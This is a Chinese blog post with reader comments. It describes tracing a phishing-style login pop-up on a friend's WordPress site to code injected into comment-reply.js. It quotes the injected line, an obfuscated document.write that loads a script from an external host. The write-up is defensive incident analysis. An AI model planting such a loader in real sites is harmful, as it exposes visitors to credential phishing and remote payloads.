Old

插入 comment-reply.js 的恶意 js 代码

今天有个朋友找我,说他的博客打开文章页就弹出如下图所示登陆框:点击取消就能打开文章页。

插入 comment-reply.js 的恶意 js 代码

这很蛋疼,好好的博客被插,朋友也咨询了新网客服,得到答复就是“被插”,而且不是他一个人的博客被插,很多人都有类似情况。

既然朋友找我,那么就要帮忙一下了。我用 Firebug 查看,发现文章页被引用一个 js 文件,这个 js 文件如下图:

我查看了主题代码,没有发现引用此 js 文件的代码。然后我尝试把所有插件停止,问题依旧。

继续,因为 js 文件是被引用在 header 里,所以可以肯定是自动插入的,自动在 WordPress 的 header.php 引用 js 文件,那么肯定就是 wp_head() 函数。

于是我删了 wp_head(),那个弹窗就没了。说明我的判断没错,但是问题是哪里引用的呢? functions.php 里面没有,插件全部停止了,那么下一步的判断就是 js 文件。我重新吧 wp_head() 函数放上,然后把主题里面引用的 js 都去掉了,问题依旧。再用 Firebug 查看,发现 comment-reply.js 被引用,除了它就是刚才上面第二张图片显示的 js,那么现在可以肯定问题出在 comment-reply.js,但 header.php 里面的 comment-reply.js 调用函数我屏蔽了啊?我再仔细看了一下 functions.php,原来我这个朋友的主题的 functions.php 里面也有一个 comment-reply.js 调用函数!Orz!

我用 ftp 然后用 notepad++ 打开 comment-reply.js 一看,嚯嚯,恶意代码原形毕露:

document.write(unescape("%3Cscript src='http://bijioc.googlecode.com/svn/trunk/js/navigatenormal.js?v="+(new Date().toDateString().replace(/\s/g, ''))+".js' type='text/javascript'%3E%3C/script%3E"));

厉害,竟然想到隐藏在这里!

好吧,说了这么多废话,就是说文章标题而已,主要是提醒朋友注意了,发现类似情况不用抓头了,直接看 /wp-includes/js/comment-reply.js 吧。

zww
or
oooo

声明: 除非注明,ZWWoOoOo文章均为原创,转载请以链接形式标明本文地址
本文地址: http://zww.me/archives/25587

64 comments

  1. Bolo Bolo Google Chrome 17.0.963.56 Google Chrome 17.0.963.56 Mac OS X  10.7.3 Mac OS X 10.7.3

    最近很多wordpress博客被黑了,原因是主题或者插件中使用了有漏洞的库,所以找人做主题或者插件一定要找靠谱的人

    沙发
  2. phoetry phoetry Opera 10.10 Opera 10.10 Windows 7 Windows 7

    WP主题制作门槛太低, 以至如今主题良莠不齐, 甚至很多只会平面设计的都开始制作收费主题. 他们大多是在网上寻一些现成的"功能代码"引入主题然后便"成型", 这实在是很危险的, 并且也无法整顿, 因为WP是开源的.

    板凳
  3. 软件盒子 软件盒子 Firefox 11.0 Firefox 11.0 Windows 7 x64 Edition Windows 7 x64 Edition

    楼上两位说的对啊 :lol:

    地板
  4. ......
  5. Kayo Kayo Google Chrome 17.0.963.56 Google Chrome 17.0.963.56 Windows 8 Windows 8

    开源的项目容易受安全问题困扰,WP自然也是跑不掉了,大家注意检查一下!

    21楼
  6. 八方SEO 八方SEO Google Chrome 17.0.963.66 Google Chrome 17.0.963.66 Windows 7 Windows 7

    我的主题也会被杀软误报,也是JS,文章页里面的评论,不知道哪个出问题了

    22楼
  7. 平板电脑推荐 平板电脑推荐 Firefox 10.0.2 Firefox 10.0.2 Windows 8 Windows 8

    标注下,以后万一碰到了知道怎么搞。

    23楼
  8. Louis Han Louis Han Firefox 10.0.2 Firefox 10.0.2 Windows 7 x64 Edition Windows 7 x64 Edition

    嗯 没有洞的地方都可能会被插啊

    24楼
  9. 蓝色离子 蓝色离子 Google Chrome 17.0.963.78 Google Chrome 17.0.963.78 Windows 7 x64 Edition Windows 7 x64 Edition

    现在的评论框都这么炫。。

    25楼
  10. 郑永 郑永 Google Chrome 17.0.963.78 Google Chrome 17.0.963.78 Windows XP Windows XP

    现在病毒换着花样玩,都玩到wordpress了

    26楼
    • zwwooooo zwwooooo Firefox 10.0.2 Firefox 10.0.2 Windows 7 x64 Edition Windows 7 x64 Edition

      @郑永
      受荒淫就容易攻击了

    • zwwooooo zwwooooo Firefox 10.0.2 Firefox 10.0.2 Windows 7 x64 Edition Windows 7 x64 Edition

      @郑永
      你的博客大不开了……

    • 郑永 郑永 Google Chrome 17.0.963.79 Google Chrome 17.0.963.79 Windows XP Windows XP

      @zwwooooo
      正常打开,测试没有被墙,你再帮我试试吧,不可能你连国内都墙吧。

    • zwwooooo zwwooooo Firefox 10.0.2 Firefox 10.0.2 Windows 7 x64 Edition Windows 7 x64 Edition

      @郑永
      可能那天是抽风,现在可以打开了。对了,你在我这的评论的昵称乱码了,可能跟我前几天试用缓存有关,我手动帮你改过了,下次请你更正下。

  11. 郑永 郑永 Google Chrome 17.0.963.79 Google Chrome 17.0.963.79 Windows XP Windows XP

    呵呵,现在应该不乱码了,原来是我的浏览器刚换的原因吗?

    27楼
    • zwwooooo zwwooooo Firefox 10.0.2 Firefox 10.0.2 Windows 7 x64 Edition Windows 7 x64 Edition

      @郑永
      不是你的问题,是前几天我测试一个缓存插件造成的

  12. junjun junjun Google Chrome 17.0.963.79 Google Chrome 17.0.963.79 Windows 7 x64 Edition Windows 7 x64 Edition

    我好像以前也遇到过这个问题,忘记是不是在博客上了,好像是访问别人的博客的时候遇到的。前段时间我的博客也中毒了,打开就警告,后台好多乱七八糟的代码,删除后,好像好了,但是访问速度超级慢。刚才看kevin同学的博客,好像又中招了 :arrow: 估计我的也中了

    28楼
  13. junjun junjun Google Chrome 17.0.963.79 Google Chrome 17.0.963.79 Windows 7 x64 Edition Windows 7 x64 Edition

    好嘛,我刚看了果然中招了,模板每个页面都被加了一堆乱七八糟的代码 :arrow:

    29楼
  14. TRIZ TRIZ Firefox 3.6.28 Firefox 3.6.28 Windows XP Windows XP

    是啊,很多网站都是插件上面出问题!

    30楼
  15. Normal Normal Firefox 11.0 Firefox 11.0 Windows 7 Windows 7

    真厉害,我目前还是个新手,只用免费的服务器折腾一下。如果做好了准备换个稳定的空间。

    31楼

Leave a Reply